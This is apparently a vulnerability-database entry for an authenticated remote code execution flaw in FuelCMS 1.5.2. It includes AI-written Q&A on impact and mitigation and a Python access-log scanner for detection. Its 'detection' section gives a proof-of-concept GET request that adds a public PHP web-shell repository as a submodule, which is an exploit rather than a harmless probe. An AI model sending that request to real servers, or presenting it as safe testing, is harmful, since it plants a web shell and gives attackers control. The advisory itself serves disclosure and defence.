CVE-2026-30461
Status: Received - Intake
Authenticated Remote Code Execution in FuelCMS 1.5.2 Installer.php

Publication date: 2026-04-15

Last updated on: 2026-04-20

Assigner: MITRE

Description
Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the /controllers/Installer.php and the function add_git_submodule.
Meta Information
Published: 2026-04-15
Last Modified: 2026-04-20
Generated: 2026-05-07
AI Q&A: 2026-04-15
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 1 associated CPE
Vendor: thedaylightstudio
Product: fuel_cms
Version / Range: 1.5.2
CWE ID: CWE-77
Description: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-30461 is an authenticated remote code execution (RCE) vulnerability in FuelCMS version 1.5.2. It exists in the add_git_submodule function accessible via the URL path /fuel/Installer/add_git_submodule/<module>. This function allows an authenticated user to add arbitrary Git submodules from any GitHub repository if the system is running in development mode with Git over SSH enabled.

By exploiting this vulnerability, an attacker can clone a malicious Git repository containing a PHP web shell into the FuelCMS installation. The attacker can then access and execute arbitrary PHP code on the server through the injected files, effectively gaining full remote code execution capabilities.

The vulnerability requires that FuelCMS is running in development mode, Git over SSH is properly configured, and a valid .git directory exists in the root of FuelCMS.


How can this vulnerability impact me?

This vulnerability can have severe impacts including unauthorized remote code execution on the affected server. An attacker with valid authentication can execute arbitrary system commands, potentially leading to full system compromise.

  • Loss of confidentiality: sensitive data on the server can be accessed or exfiltrated.
  • Loss of integrity: attacker can modify or inject malicious code or data.
  • Loss of availability: attacker could disrupt services or delete critical files.

Because the attack requires only low privileges and no user interaction beyond authentication, it poses a critical security risk especially in development environments where this mode is enabled.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by checking if your FuelCMS instance is running in development mode with Git over SSH enabled and a valid .git directory present. Specifically, you can test if the vulnerable add_git_submodule function is accessible by sending an authenticated GET request to the URL path /fuel/Installer/add_git_submodule/<repository>/<module>.

A practical detection command involves sending a GET request similar to the proof of concept: GET /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test. If the server responds with HTTP 200 OK and zero content length, the vulnerability is likely present.

  • Use curl or a similar HTTP client with valid authentication to send the GET request to /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test.
  • Check the server response code and content length to confirm if the submodule addition is successful.
  • Verify if Git over SSH is enabled and configured on the server.
  • Confirm that the FuelCMS instance is running in development mode and that a .git directory exists in the root directory.
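Besides probing the instance directly, a defender can look for past calls to the Installer action in the web server access log. The following is an added example, not part of this record or of FuelCMS itself: it parses common-format access log lines (an assumption about the log format), URL-decodes each request path so percent-encoded repository strings are still recognised, and flags every request to /fuel/Installer/add_git_submodule/, marking those that returned HTTP 200 with zero content length, which the answer above describes as the success response. The log lines, addresses and repository name are constructed sample data.

```python
import re
from urllib.parse import unquote

# Assumption: Apache/nginx common log format ("ip - user [ts] "METHOD path proto" status size").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Path prefix of the vulnerable Installer action named in the advisory
# (compared case-insensitively, since CodeIgniter-style routing is not case-sensitive).
SUSPECT_PREFIX = "/fuel/installer/add_git_submodule/"

# Constructed sample log lines: two calls to the Installer action (one encoded, one not)
# and one unrelated dashboard request. The repository name is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - admin [15/Apr/2026:10:12:01 +0000] '
    '"GET /fuel/Installer/add_git_submodule/git%40example.invalid%3Aorg%2Frepo.git/test HTTP/1.1" 200 0',
    '203.0.113.5 - admin [15/Apr/2026:10:12:07 +0000] '
    '"GET /fuel/dashboard HTTP/1.1" 200 5123',
    '198.51.100.9 - - [15/Apr/2026:10:13:44 +0000] '
    '"GET /fuel/installer/add_git_submodule/foo/bar HTTP/1.1" 302 0',
]


def parse_line(line):
    """Split one access-log line into its fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def decoded_path(path):
    """Strip the query string and percent-decode the path once."""
    return unquote(path.split("?", 1)[0])


def is_submodule_request(path):
    """True when the request targets the add_git_submodule Installer action."""
    return decoded_path(path).lower().startswith(SUSPECT_PREFIX)


def scan_access_log(lines):
    """Return one finding per request to the Installer action, with a success hint."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_submodule_request(rec["path"]):
            continue
        decoded = decoded_path(rec["path"])
        # Everything after the prefix is the attacker-supplied <repository>/<module> part.
        target = decoded[len(SUSPECT_PREFIX):]
        # The advisory describes a successful call as HTTP 200 with zero content length.
        likely_success = rec["status"] == 200 and rec["size"] == 0
        findings.append({
            "ip": rec["ip"],
            "user": rec["user"],
            "timestamp": rec["ts"],
            "target": target,
            "status": rec["status"],
            "likely_success": likely_success,
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if f["likely_success"] else "attempt"
        print(f"{f['timestamp']} {f['ip']} user={f['user']} {flag}: {f['target']}")
```

Any hit is worth investigating regardless of the status code, since a failed call still shows that an authenticated account tried to reach the Installer action; the "likely_success" hint only prioritises the ones to check first, together with a look for unexpected submodule entries under the installation root.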

What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability immediately, you should disable development mode on your FuelCMS instance to prevent access to the add_git_submodule function.

Additionally, restrict or disable Git over SSH access on the server to prevent unauthorized Git submodule additions.

Ensure that only trusted and authorized users have authenticated access to the FuelCMS system, as exploitation requires authentication.

If possible, remove or restrict the .git directory in the root of the FuelCMS installation to limit Git operations.

Since the vendor is unlikely to issue a fix, consider isolating or upgrading the system to a more secure environment or CMS version if available.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The CVE-2026-30461 vulnerability allows authenticated users to execute arbitrary code remotely on FuelCMS installations running in development mode with Git over SSH enabled. This can lead to unauthorized access, modification, or destruction of sensitive data hosted on the affected system.

Such unauthorized access and potential data breaches can compromise the confidentiality, integrity, and availability of personal or sensitive information, which are core requirements of common standards and regulations like GDPR and HIPAA.

Therefore, if exploited, this vulnerability could result in non-compliance with these regulations due to failure to adequately protect sensitive data and maintain secure systems.

